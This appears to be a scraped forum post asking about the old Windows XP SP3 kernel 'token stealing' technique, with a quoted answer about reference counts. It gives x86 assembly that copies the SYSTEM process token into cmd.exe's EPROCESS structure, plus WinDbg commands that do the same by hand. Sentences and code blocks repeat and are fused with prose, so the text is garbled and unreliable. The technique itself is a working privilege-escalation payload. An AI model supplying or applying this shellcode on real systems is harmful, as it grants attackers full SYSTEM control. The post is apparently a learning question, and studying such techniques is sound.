hi
this code is old method to gain system token to our process(example cmd.exe )
i know _EX_FAST_REF is union and last 3 bit must be 0 so token field point to real token object ( in x64 its 4 bit)
code:
i asked EP why closing cme.exe dont lead system to crash ( system must free closed object , so system process token now must point to invalid object )
he say
what i do Exactly in windbg
81eef138 = system EPROCESS
_EX_FAST_REF offset in XPSP3 is 0x0c8
result => e1000805
81f49620 = cmd.exe EPROCESS
this code is old method to gain system token to our process(example cmd.exe )
i know _EX_FAST_REF is union and last 3 bit must be 0 so token field point to real token object ( in x64 its 4 bit)
Code: Select all
so what is problem if we wholly change _EX_FAST_REF of cmd with _EX_FAST_REF of system ?mov edi, [System_EPROCESS+WINXP_TOKEN_OFFSET] ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h ; Must be aligned by 8
mov [CMD_EPROCESS+WINXP_TOKEN_OFFSET], edi ; We replace the token of the cmd process
; to escalate by the token of the process
; with SYSTEM PID
code:
Code: Select all
i do it and it work prefect without any problem ( after this cmd.exe get system account )mov ebx,[System_EPROCESS+WINXP_TOKEN_OFFSET]
mov [CMD_EPROCESS+WINXP_TOKEN_OFFSET] ,ebx ; now cmd EPROCESS _EX_FAST_REF must point to system _EX_FAST_REF i asked EP why closing cme.exe dont lead system to crash ( system must free closed object , so system process token now must point to invalid object )
he say
System will not free this token object because it RefCount will not be counted as 0 after cmd.exe exits. Look at "System" process token. Every of them has at least 1 referencewhy system token have big RefCount number ?
what i do Exactly in windbg
81eef138 = system EPROCESS
_EX_FAST_REF offset in XPSP3 is 0x0c8
Code: Select all
dpa 81eef138+0x0c8result => e1000805
81f49620 = cmd.exe EPROCESS
Code: Select all
thanksep 81f49620+0x0c8 e1000805@R00tkitSMM
